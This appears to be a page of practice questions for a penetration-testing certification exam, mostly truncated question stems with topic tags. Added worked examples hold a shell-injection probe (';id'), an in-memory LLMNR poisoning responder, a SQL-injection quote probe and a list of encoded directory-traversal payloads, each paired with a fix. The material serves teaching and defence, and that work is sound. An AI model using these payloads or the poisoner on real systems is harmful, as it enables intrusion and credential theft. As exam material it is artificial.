PT0-001 Practice Questions
248 real PT0-001 exam questions with expert-verified answers and explanations. Page 5 of 5.
- Question #207 (Attacks and exploits)
Which of the following can be used to perform online password attacks against RDP?
Tags: RDP brute force, online password attack, Ncrack, credential attacks

- Question #208 (Attacks and exploits)
A company received a report with the following finding: While on the internal network, the penetration tester was able to successfully capture SMB broadcasted user ID and password in...
Tags: SMB credential capture, network-level authentication, domain join, remediation

- Question #209 (Engagement management)
Which of the following actions BEST matches a script kiddie threat actor?
Tags: threat actors, script kiddie, threat modeling, attacker motivation

- Question #210 (Post-exploitation and lateral movement)
A penetration tester has compromised a system and wishes to connect to a port on it from the attacking machine to control the system. Which of the following commands should the test...
Tags: netcat, bind shell, command and control, reverse shell

- Question #211 (Engagement management)
An organization has requested that a penetration test be performed to determine if it is possible for an attacker to gain a foothold on the organization's server segment. During the...
Tags: rules of engagement, prior compromise, ethics, incident handling

- Question #212 (Attacks and exploits)
A penetration tester has obtained access to an IP network subnet that contains ICS equipment intercommunication. Which of the following attacks is MOST likely to succeed in creatin...
Tags: ICS security, DNS cache poisoning, OT attacks, industrial control systems

- Question #213 (Engagement management)
Which of the following BEST describes the difference between a red team engagement and a penetration test?
Tags: red team, penetration testing, engagement scope, methodology

- Question #214 (Attacks and exploits)
A penetration tester is performing a remote internal penetration test by connecting to the testing system from the Internet via a reverse SSH tunnel. The testing system has been pl...
Tags: ARP spoofing, ettercap, man-in-the-middle, network attacks

- Question #215 (Attacks and exploits)
While performing privilege escalation on a Windows 7 workstation, a penetration tester identifies a service that imports a DLL by name rather than an absolute path. To exploit this...
Tags: DLL hijacking, privilege escalation, Windows, folder permissions

- Question #216 (Reconnaissance and enumeration)
The scope of a penetration test requires the tester to be stealthy when performing port scans. Which of the following commands with Nmap BEST supports stealthy scanning?
Tags: Nmap, stealth scanning, port scanning, host-timeout

- Question #217 (Engagement management)
During a physical security review, a detailed penetration testing report was obtained, which was issued to a security analyst and then discarded in the trash. The report contains v...
Tags: physical security, document handling, sensitive information, policy

- Question #218 (Engagement management)
A penetration tester is performing a black-box test of a client web application, and the scan host is unable to access it. The client has sent screenshots showing the system is fun...
Tags: OAuth, bearer token, web application testing, authentication

- Question #219 (Reconnaissance and enumeration)
A penetration tester ran an Nmap scan against a target and received the following output: Which of the following commands would be best for the penetration tester to execute NEXT t...
Tags: SNMP, snmpwalk, service enumeration, Nmap

- Question #220 (Engagement management)
A penetration tester needs to provide the code used to exploit a DNS server in the final report. In which of the following parts of the report should the penetration tester place t...
Tags: report writing, pentest report structure, executive summary, documentation

- Question #221 (Vulnerability discovery and analysis)
A client needs to be PCI compliant and has external-facing web servers. Which of the following CVSS vulnerability scores would automatically bring the client out of compliance stan...
Tags: CVSS scoring, PCI compliance, vulnerability scoring, compliance thresholds

- Question #222 (Attacks and exploits)
A MITM attack is being planned. The first step is to get information flowing through a controlled device. Which of the following should be used to accomplish this?
Tags: evil twin, MITM, rogue AP, wireless attacks

- Question #223 (Vulnerability discovery and analysis)
During a vulnerability assessment, the security consultant finds a legacy Windows XP system that is running a critical business function. Which of the following mitigations is BEST for th...
Tags: legacy systems, WAF, compensating controls, risk mitigation

- Question #224 (Attacks and exploits)
A penetration tester is performing a wireless penetration test. Which of the following are some vulnerabilities that might allow the penetration tester to easily and quickly access...
Tags: WPA2, WPS attacks, wireless security, password attacks

- Question #225 (Post-exploitation and lateral movement)
A penetration tester has successfully exploited a Windows host with low privileges and found directories with the following permissions: Which of the following should be performed...
Tags: privilege escalation, process migration, Windows, post-exploitation

- Question #226 (Post-exploitation and lateral movement)
A penetration tester has discovered through automated scanning that a Tomcat server allows for the use of default credentials. Using default credentials, the tester is able to uplo...
Tags: Tomcat, default credentials, WAR file upload, web shell

- Question #227 (Engagement management)
A penetration tester used an ASP.NET web shell to gain access to a web application, which allowed the tester to pivot in the corporate network. Which of the following is the MOST i...
Tags: attestation, post-engagement, report delivery, engagement closure

- Question #228 (Engagement management)
A penetration tester is planning to conduct a distributed dictionary attack on a government domain against the login portal. The tester will leverage multiple proxies to mask the o...
Tags: threat actors, APT, distributed attack, anonymization

- Question #229 (Engagement management)
A client's systems administrator requests a copy of the report from the penetration tester, but the systems administrator is not listed as a point of contact or signatory. Which of...
Tags: report distribution, authorization, confidentiality, engagement management

- Question #230 (Reconnaissance and enumeration)
At the information gathering stage, a penetration tester is trying to passively identify the technology running on a client's website. Which of the following approaches should the...
Tags: passive reconnaissance, web fingerprinting, OSINT, information gathering

- Question #231 (Vulnerability discovery and analysis)
Which of the following BEST protects against a rainbow table attack?
Tags: rainbow tables, password security, cryptography, password attacks

- Question #232 (Attacks and exploits)
A penetration tester is assessing the security of a web form for a client and enters ";id" in one of the fields. The penetration tester observes the following response: Based on th...
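Worked example for Question #232, added to this listing and not part of the original question bank. It shows the same form-field handler written two ways: the vulnerable version splices the field into a command string and hands it to a shell, so the ";" in ";id" ends the intended command and the shell runs id(1) as a second one; the hardened version validates the field against a hostname grammar and passes it as its own argv element, so nothing tokenizes it. `echo` stands in for whatever diagnostic tool the real form wraps; that choice, the hostname regex and the triage check are assumptions.

```python
import re
import subprocess

PAYLOAD = ";id"  # the probe from the question

# Assumed hostname grammar: dot-separated labels of letters, digits and hyphens.
HOSTNAME_RE = re.compile(
    r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def lookup_vulnerable(host: str) -> str:
    """Vulnerable: the field is interpolated into a command line and run with
    shell=True. 'echo' stands in for the real tool; the ';' in the input ends the
    echo command and the shell executes 'id' as a second command."""
    done = subprocess.run(f"echo {host}", shell=True, capture_output=True, text=True)
    return done.stdout + done.stderr


def lookup_hardened(host: str) -> str:
    """Hardened: reject anything that is not a hostname, then pass the value as a
    separate argv element so no shell parses it. ';id' is now just an argument."""
    if not HOSTNAME_RE.fullmatch(host):
        raise ValueError(f"rejected field value: {host!r}")
    done = subprocess.run(["echo", host], capture_output=True, text=True)
    return done.stdout


def shows_command_execution(response: str) -> bool:
    """Triage check for the response the tester observed: id(1) output present."""
    return re.search(r"\buid=\d+", response) is not None
```

The validation step matters even with the argv form: an allow-list on the input keeps a later refactor (or a tool that itself interprets option-looking arguments) from reintroducing the problem.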
Tags: command injection, web application, OS command execution, input validation

- Question #233 (Reconnaissance and enumeration)
A penetration tester is connected to a client's local network and wants to passively identify cleartext protocols and potentially sensitive data being communicated across the netwo...
Tags: network sniffing, cleartext protocols, MITM, passive enumeration

- Question #234 (Post-exploitation and lateral movement)
A penetration tester directly connects to an internal network. Which of the following exploits would work BEST for quick lateral movement within an internal network?
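Worked example for Question #234, added here and not part of the original question bank. LLMNR (UDP 5355, IPv4 multicast 224.0.0.252) reuses the DNS message format; when a Windows host cannot resolve a single-label name through DNS it multicasts an LLMNR query that any host on the segment may answer, and a poisoner answers with its own address so the victim's subsequent SMB connection authenticates to the attacker. The code builds the query a victim would send, parses it, and builds and parses the poisoned answer, all in memory; the host name, transaction ID and attacker address are constructed values.

```python
import ipaddress
import struct

LLMNR_PORT = 5355            # UDP; IPv4 multicast group 224.0.0.252
TYPE_A, CLASS_IN = 1, 1
FLAG_RESPONSE = 0x8000       # QR bit: clear in a query, set in an answer


def encode_name(name: str) -> bytes:
    """DNS wire-format name: length-prefixed labels ending with a zero byte."""
    return b"".join(bytes([len(lbl)]) + lbl.encode() for lbl in name.split(".")) + b"\x00"


def decode_name(data: bytes, off: int):
    """Decode a wire-format name at `off`; returns (name, offset after it).
    Handles compression pointers (0xC0xx), which real stacks use in answers."""
    labels = []
    while True:
        length = data[off]
        off += 1
        if length == 0:
            break
        if length & 0xC0 == 0xC0:
            pointer = ((length & 0x3F) << 8) | data[off]
            tail, _ = decode_name(data, pointer)
            labels.append(tail)
            off += 1
            break
        labels.append(data[off:off + length].decode())
        off += length
    return ".".join(labels), off


def build_query(txid: int, name: str) -> bytes:
    """What a victim multicasts after DNS fails for a single-label name."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)   # id, flags, qd, an, ns, ar
    return header + encode_name(name) + struct.pack("!HH", TYPE_A, CLASS_IN)


def parse_query(pkt: bytes) -> dict:
    txid, flags, qdcount, _, _, _ = struct.unpack("!HHHHHH", pkt[:12])
    if flags & FLAG_RESPONSE or qdcount != 1:
        raise ValueError("not a single-question LLMNR query")
    name, off = decode_name(pkt, 12)
    qtype, qclass = struct.unpack("!HH", pkt[off:off + 4])
    return {"txid": txid, "name": name, "qtype": qtype, "qclass": qclass, "qend": off + 4}


def build_poisoned_response(query: bytes, attacker_ip: str, ttl: int = 30) -> bytes:
    """Poisoner: echo the victim's transaction ID and question, answer with our address."""
    q = parse_query(query)
    header = struct.pack("!HHHHHH", q["txid"], FLAG_RESPONSE, 1, 1, 0, 0)
    question = query[12:q["qend"]]
    answer = (encode_name(q["name"])
              + struct.pack("!HHIH", TYPE_A, CLASS_IN, ttl, 4)
              + ipaddress.IPv4Address(attacker_ip).packed)
    return header + question + answer


def parse_response(pkt: bytes) -> dict:
    """Victim side: read the first A record; this is the address it will connect to."""
    txid, flags, _, ancount, _, _ = struct.unpack("!HHHHHH", pkt[:12])
    if not flags & FLAG_RESPONSE or ancount < 1:
        raise ValueError("not an LLMNR answer")
    _, off = decode_name(pkt, 12)
    off += 4                                      # skip qtype, qclass
    name, off = decode_name(pkt, off)
    rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
    rdata = pkt[off + 10:off + 10 + rdlen]
    return {"txid": txid, "name": name, "ttl": ttl, "ip": str(ipaddress.IPv4Address(rdata))}
```

On a real segment the poisoner joins the multicast group, watches for queries and unicasts this answer back to the querier; the victim accepts it because nothing in LLMNR authenticates the responder. The remediation side follows from the same fact: a host with LLMNR (and NBT-NS) disabled by Group Policy never sends the query, so there is nothing to answer.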
Tags: lateral movement, LLMNR poisoning, credential harvesting, Windows networking

- Question #235 (Attacks and exploits)
A penetration tester runs the following on a machine: Which of the following will be returned?
Tags: scripting, code analysis, enumeration logic, output parsing

- Question #236 (Attacks and exploits)
A penetration tester discovers an anonymous FTP server that is sharing the C:\drive. Which of the following is the BEST exploit?
Tags: anonymous FTP, service binary hijacking, privilege escalation, Windows exploitation

- Question #237 (Engagement management)
Which of the following is the MOST comprehensive type of penetration test on a network?
Tags: penetration test types, black box, engagement scope, methodology

- Question #238 (Vulnerability discovery and analysis)
An attacker performed a MITM attack against a mobile application. The attacker is attempting to manipulate the application's network traffic via a proxy tool. The attacker only see...
Tags: certificate pinning, SSL/TLS, mobile application security, proxy bypass

- Question #239 (Engagement management)
A company decides to remediate issues identified from a third-party penetration test done to its infrastructure. Management should instruct the IT team to:
Tags: vulnerability remediation, risk prioritization, patch management, engagement follow-up

- Question #240 (Post-exploitation and lateral movement)
A penetration tester successfully exploits a system, receiving a reverse shell. Which of the following is a Meterpreter command that is used to harvest locally stored credentials?
Tags: Meterpreter, hashdump, credential harvesting, Metasploit

- Question #241 (Attacks and exploits)
A penetration tester is testing a web application and is logged in as a lower-privileged user. The tester runs arbitrary JavaScript within an application, which sends an XMLHttpReq...
Tags: broken access control, XSS, authorization bypass, privilege escalation

- Question #242 (Post-exploitation and lateral movement)
During the exploitation phase of a penetration test, a vulnerability is discovered that allows command execution on a Linux web server. A cursory review confirms the system access...
Tags: privilege escalation, sudoers, Linux, www-data

- Question #243 (Engagement management)
During an engagement, a consultant identifies a number of areas that need further investigation and require an extension of the engagement. Which of the following is the MOST likel...
Tags: scoping, engagement planning, project management

- Question #244 (Attacks and exploits)
A penetration tester has been hired to perform a penetration test for an organization. Which of the following is indicative of an error-based SQL injection attack?
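Worked example for Question #244, added here and not part of the original question bank. The indicator of error-based SQL injection is that a benign value returns data while the same value with a stray quote returns a database error, which tells the tester that input reaches the query unescaped and usually which engine is behind it. The code pairs a string-built query that echoes the engine's error with its parameterized replacement and runs the baseline/probe pair against both; the SQLite in-memory table and its rows are constructed for the example.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the application's database (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (username, role) VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "user")])
    return conn


def find_user_vulnerable(conn, username: str) -> dict:
    """Vulnerable: string-built SQL, and the engine's error text goes back to the
    client. A single quote breaks the literal, the statement fails to parse, and
    the message confirms injection and fingerprints the backend."""
    sql = f"SELECT id, role FROM users WHERE username = '{username}'"
    try:
        return {"rows": conn.execute(sql).fetchall(), "error": None}
    except sqlite3.Error as exc:
        return {"rows": [], "error": f"{type(exc).__name__}: {exc}"}


def find_user_parameterized(conn, username: str) -> dict:
    """Fixed: the value is bound, never parsed as SQL; a quote is just a character."""
    rows = conn.execute("SELECT id, role FROM users WHERE username = ?", (username,)).fetchall()
    return {"rows": rows, "error": None}


def error_based_sqli_indicated(baseline: dict, probe: dict) -> bool:
    """The tester's heuristic: benign value works, value plus a quote yields a DB error."""
    return baseline["error"] is None and probe["error"] is not None


def probe(conn, lookup, username: str = "alice") -> bool:
    """Run the baseline/probe pair against either implementation."""
    return error_based_sqli_indicated(lookup(conn, username), lookup(conn, username + "'"))
```

Binding parameters removes the injection; separately, returning a generic error to the client instead of the engine's text removes the oracle that makes the error-based technique productive even where some other sink remains.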
Tags: SQL injection, error-based SQLi, web application, payload

- Question #245 (Engagement management)
When negotiating a penetration testing contract with a prospective client, which of the following disclaimers should be included in order to mitigate liability in case of a future...
Tags: contract management, liability disclaimer, legal considerations, scoping

- Question #246 (Post-exploitation and lateral movement)
A tester was able to retrieve domain users' hashes. Which of the following tools can be used to uncover the users' passwords? (Choose two.)
Tags: password cracking, credential harvesting, hash cracking, NTLM

- Question #247 (Attacks and exploits)
A penetration tester is attempting to open a socket in a bash script but receives errors when running it. The current state of the relevant line in the script is as follows: Which...
Tags: bash scripting, TCP socket, /dev/tcp, reverse shell

- Question #248 (Vulnerability discovery and analysis)
A vulnerability scan report shows what appears to be evidence of a memory disclosure vulnerability on one of the target hosts. The administrator claims the system is patched and th...
Tags: false positive validation, memory disclosure, vulnerability verification, dynamic analysis

- Question #249 (Post-exploitation and lateral movement)
A penetration tester has gained physical access to a facility and connected directly into the internal network. The penetration tester now wants to pivot into the server VLAN. Whic...
Tags: VLAN hopping, network pivoting, STP attack, layer 2 attacks

- Question #250 (Attacks and exploits)
During an engagement, an insecure direct object reference vulnerability was discovered that allows the extraction of highly sensitive PII. The tester is required to extract and then...
Tags: IDOR, Python scripting, web scraping, type error

- Question #251 (Engagement management)
A security team is switching firewall vendors. The director of security wants to scope a penetration test to satisfy requirements to perform the test after major architectural chan...
Tags: red team, penetration test scoping, objective-based assessment, firewall

- Question #252 (Attacks and exploits)
A penetration tester has identified a directory traversal vulnerability. Which of the following payloads could have helped the penetration tester identify this vulnerability?
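Worked example for Question #252, added here and not part of the original question bank. It collects the payload shapes a tester sends to find a traversal (plain, backslash, URL-encoded, double-encoded, overlong UTF-8 separator, and the "....//" form that survives a single strip of "../"), normalizes each the way a careful server should, and checks whether the result escapes the document root. Alongside the correct containment check it includes the common wrong fix, deleting "../" once, to show which payload gets through it. The document root, payload list and decode limit are constructed for the example.

```python
import posixpath
import urllib.parse

# Constructed probe set: what gets sent to find the issue, plus filter-bypass variants.
TRAVERSAL_PAYLOADS = [
    "../../../../etc/passwd",              # plain
    "..\\..\\..\\windows\\win.ini",        # backslash separators (Windows targets)
    "%2e%2e%2f%2e%2e%2fetc%2fpasswd",      # URL-encoded
    "%252e%252e%252fetc%252fpasswd",       # double-encoded, for a check-then-decode gap
    "..%c0%af..%c0%afetc/passwd",          # overlong UTF-8 '/', historically IIS
    "....//....//etc/passwd",              # becomes '../../' after one strip of '../'
]


def normalize(user_path: str, max_rounds: int = 3) -> str:
    """Decode until stable, map overlong and backslash separators, collapse dot segments."""
    s = user_path
    for _ in range(max_rounds):
        raw = urllib.parse.unquote_to_bytes(s)
        raw = raw.replace(b"\xc0\xaf", b"/").replace(b"\xc0\xae", b".")
        nxt = raw.decode("utf-8", errors="replace")
        if nxt == s:
            break
        s = nxt
    return posixpath.normpath(s.replace("\\", "/"))


def resolves_outside(base: str, user_path: str) -> bool:
    """Does the normalized path, joined to the document root, leave that root?
    An absolute user path also fails here, since join() discards the base for it."""
    base = posixpath.normpath(base)
    full = posixpath.normpath(posixpath.join(base, normalize(user_path)))
    return full != base and not full.startswith(base + "/")


def naive_sanitize(user_path: str) -> str:
    """A common wrong fix: delete '../' once. '....//' collapses into '../' after it."""
    return user_path.replace("../", "")


def safe_join(base: str, user_path: str) -> str:
    """The fix that holds: normalize, join, then refuse anything outside base."""
    if resolves_outside(base, user_path):
        raise ValueError(f"path escapes {base}: {user_path!r}")
    return posixpath.normpath(posixpath.join(posixpath.normpath(base), normalize(user_path)))


def classify(base: str, payloads) -> dict:
    """Which payloads actually escape `base` once normalized."""
    return {p: resolves_outside(base, p) for p in payloads}
```

Note that "....//....//etc/passwd" is not itself a traversal once normalized; it only becomes one after a filter that strips "../" rewrites it, which is why detection and remediation both have to operate on the fully decoded, canonical path and then check containment, rather than pattern-match the raw input.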
Tags: directory traversal, path traversal, web application, payload identification

- Question #253 (Engagement management)
An individual has been hired by an organization after passing a background check. The individual has been passing information to a competitor over a period of time. Which of the fo...
Tags: insider threat, threat classification, threat actors

- Question #254 (Attacks and exploits)
A senior employee received a suspicious email from another executive requesting an urgent wire transfer. Which of the following types of attacks is likely occurring?
Tags: spear phishing, social engineering, whaling, BEC